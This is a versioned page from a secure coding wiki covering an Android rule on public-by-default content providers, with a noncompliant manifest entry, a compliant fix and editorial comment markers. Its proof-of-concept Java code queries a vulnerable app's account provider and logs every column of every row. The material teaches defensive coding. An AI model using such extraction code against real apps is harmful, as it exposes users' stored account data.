Android

Space shortcuts

Page tree

Versions Compared

Old Version 5

changes.mady.by.user Yozo TODA

Saved on

compared with

New Version 6

changes.mady.by.user Fred Long

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.
Comment: Tidied up to conform to our rules format

The ContentProvider class provides a mechanism for managing and sharing data with other applications. When sharing a provider’s data with other apps, access control should be carefully implemented to prohibit unauthorized access to your sensitive data.

There are three ways to limit access to your the content provider:

  • Public
  • Private
  • Restricted access

...

The following entry in the AndroidManifest.xml does not have the android:exported attribute, which means, before API Level 16, the content provider is made public:

AndroidManifest.xml

Code Block
bgColor#FFCCCC
<provider android:name=".content.AccountProvider" android:authorities="jp.co.vulnerable.accountprovider" />

Proof of Concept

...

The following code shows how this could be exploited: 

Code Block
// check whether movatwi is installed.
try {
  ApplicationInfo info = getPackageManager().getApplicationInfo("jp.co.vulnerable", 0);[cjl5] 
} catch (NameNotFoundException e) {
  Log.w(TAG, "the app is not installed.");
  return;
}
// extract account data through content provider
Uri uri = Uri.parse("content://jp.co.vulnerable.accountprovider");
Cursor cur = getContentResolver().query(uri, null, null, null, null);[cjl6] 
StringBuilder sb = new StringBuilder();
if (cur != null) {
  int ri = 0;
  while (cur.moveToNext()) {
    ++ri;
    Log.i(TAG, String.format("row[%d]:", ri));
    sb.setLength(0);
    for (int i = 0; i < cur.getColumnCount(); ++i) {
      String column = cur.getColumnName(i);
      String value = cur.getString(i);
      if (value != null) {
        value = value.replaceAll("[\r\n]", "");
      }
      Log.i(TAG, String.format("\t%s:\t%s", column, value));
    }
  }
} else {
  Log.i(TAG, "Can't get the app information.");
}
 
Compliant Solution
The following entry in the AndroidManifest.xml file makes the content provider private so that other apps cannot access the data:
 Code Block
bgColor#CCCCFF
<provider android:name=".content.AccountProvider" android:exported="false" android:authorities="jp.co.vulnerable.accountprovider" />

Risk Assessment
Declaring a public content provider can leak sensitive information to malicious apps.
Rule
Severity
Likelihood
Remediation Cost
Priority
Level
DRD01-J
high
probable
low
P18
L1
Automated Detection
It is trivial to automatically detect when a content provider is declared public.
Related Vulnerabilities
Related Guidelines
Android Secure Coding Guidebook by JSSEC[cjl3] 
4.3. Creating/Using a Content Provider (2013/4/1 edition)
4.3.1.1. Creating/Using a private content provider
4.3.1.3. Creating/Using a partner-limited content provider (white listing)
4.3.1.4. Creating/Using a private content provider (signature permission)
4.3.1.5. Creating/Using a temporary content provider
4.3.2.1. Never create a content provider to be used only within the app for Android 2.2 (API Level 8) and before
4.3.2.2. Never publish a content provider which is intended to be used only within the application
4.3.2.4. Verify signature permission before use
Bibliography
Android Secure Coding Guidebook by JSSEC
 4.3. Creating/Using a Content Provider (2013/4/1 edition)
    [cjl2]Does the following code need an introductory sentence? Is this heading descriptive enough?
  [cjl3]I cannot find Android Secure Coding Guidebook, but it needs to be added to the references and a citation used here ([JSSEC year])